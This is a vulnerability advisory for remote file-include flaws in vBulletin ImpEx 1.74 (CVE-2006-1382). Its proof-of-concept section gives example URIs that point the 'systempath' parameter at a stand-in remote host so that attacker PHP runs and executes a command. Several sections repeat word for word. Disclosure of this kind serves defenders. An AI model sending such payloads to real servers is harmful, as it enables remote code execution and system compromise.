VBulletin ImpEx Multiple Remote File Include Vulnerabilities
BID:17206
Info
VBulletin ImpEx Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 17206 |
| Class: | Input Validation Error |
| CVE: |
CVE-2006-1382 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 23 2006 12:00AM |
| Updated: | May 04 2007 10:39PM |
| Credit: | ReZEN of XOR Crew is credited with the discovery of the vulnerability in 'ImpExData.php'. [email protected] discovered the issues in the rest of the scripts. |
| Vulnerable: |
VBulletin ImpEx 1.74 |
| Not Vulnerable: | |
Discussion
VBulletin ImpEx Multiple Remote File Include Vulnerabilities
vBulletin ImpEx is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
vBulletin ImpEx is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Exploit / POC
VBulletin ImpEx Multiple Remote File Include Vulnerabilities
Attackers can use a browser to exploit this issue.
The following example URIs demonstrate these issues:
http://www.example.com/forum/impex/ImpExModule.php?systempath=http://www.example2.com/cmd?&=id
http://www.example.com/forum/impex/ImpExController.php?systempath=http://www.example2.com/cmd?&=id
http://www.example.com/forum/impex/ImpExDisplay.php?systempath=http://www.example2.com/cmd?&=id
http://www.example.com/impex/ImpExData.php?systempath=[shell-attack]
The following exploit is available:
Attackers can use a browser to exploit this issue.
The following example URIs demonstrate these issues:
http://www.example.com/forum/impex/ImpExModule.php?systempath=http://www.example2.com/cmd?&=id
http://www.example.com/forum/impex/ImpExController.php?systempath=http://www.example2.com/cmd?&=id
http://www.example.com/forum/impex/ImpExDisplay.php?systempath=http://www.example2.com/cmd?&=id
http://www.example.com/impex/ImpExData.php?systempath=[shell-attack]
The following exploit is available:
Solution / Fix
VBulletin ImpEx Multiple Remote File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
References
VBulletin ImpEx Multiple Remote File Include Vulnerabilities
References:
References:
- ImpEx Import System (vBulletin)
- vBulletin ImpEx <= 1.74 - Remote Command Execution Vulnerability (ReZEN)
- Vendor Homepage (Kyberna)
- Remote File Include In Script impex (Hasadya Raed)
- Remote File Inclusion in VBulletin ImpEx ([email protected])